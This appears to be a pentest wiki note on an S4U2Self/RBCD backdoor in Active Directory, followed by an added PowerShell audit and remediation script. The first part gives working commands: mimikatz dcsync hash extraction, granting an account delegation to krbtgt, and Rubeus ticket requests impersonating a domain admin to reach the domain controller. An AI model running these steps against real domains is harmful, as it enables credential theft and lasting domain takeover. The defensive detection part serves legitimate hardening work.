S4U2Self backdoor
Run on the domain controller to find accounts that have an SPN and whose password never expires:
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F553.png&width=768&dpr=4&quality=100&sign=63a96ed6&sv=1)
Use mimikatz's dcsync to extract the user's hash:
>lsadump::dcsync /domain:zone.com /user:y
Plant the backdoor (grant the chosen account resource-based constrained delegation to krbtgt):
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount <account>
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F555.png&width=768&dpr=4&quality=100&sign=341c373c&sv=1)
After the backdoor is in place, use it: log in as account y.
Trigger the backdoor:
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F556.png&width=768&dpr=4&quality=100&sign=ee450943&sv=1)
Inject the ticket to obtain access to the domain controller's CIFS and LDAP services:
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt
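A defender-side check for the backdoor described above, as an added example that is not part of the original note. It assumes the RSAT ActiveDirectory module is available and that the caller can read krbtgt and (for the remediation function) write to it:

```powershell
# Added example: audit and remove RBCD entries on krbtgt (not from the original note).
# Assumes the ActiveDirectory module is installed and the caller can read/write krbtgt.
Import-Module ActiveDirectory

function Get-RbcdPrincipalsOnKrbtgt {
    # PrincipalsAllowedToDelegateToAccount is the friendly view of
    # msDS-AllowedToActOnBehalfOfOtherIdentity. Any principal listed here can
    # use S4U2Self/S4U2Proxy to obtain tickets to krbtgt as arbitrary users,
    # which is exactly the backdoor planted above. krbtgt should never have any.
    $krbtgt = Get-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount
    return $krbtgt.PrincipalsAllowedToDelegateToAccount
}

function Get-AllRbcdTargets {
    # Every object in the domain with RBCD configured. krbtgt or any domain
    # controller account appearing here is a red flag worth investigating.
    Get-ADObject -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' |
        Select-Object DistinguishedName, ObjectClass
}

function Get-SpnPasswordNeverExpiresAccounts {
    # The same candidate set the note enumerates (SPN set, password never
    # expires): long-lived accounts that make convenient hosts for a planted
    # RBCD entry, so they deserve extra monitoring.
    Get-ADUser -Filter * -Properties ServicePrincipalName, PasswordNeverExpires |
        Where-Object { ($_.ServicePrincipalName.Count -gt 0) -and $_.PasswordNeverExpires } |
        Select-Object SamAccountName, ServicePrincipalName
}

function Remove-RbcdPrincipalsOnKrbtgt {
    # Remediation: clear the attribute entirely. Tickets already minted via the
    # backdoor are encrypted with krbtgt's key and stay valid until it is
    # rotated, so follow up by resetting the krbtgt password (twice, allowing
    # replication in between) and the planted account's password.
    # With Directory Service Changes auditing enabled, the original write to
    # this attribute is recorded as event ID 5136 on the DC.
    Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount $null
}

$principals = Get-RbcdPrincipalsOnKrbtgt
if ($principals) {
    Write-Warning "krbtgt has RBCD principals: $($principals -join ', ')"
} else {
    Write-Output "krbtgt has no RBCD principals."
}
```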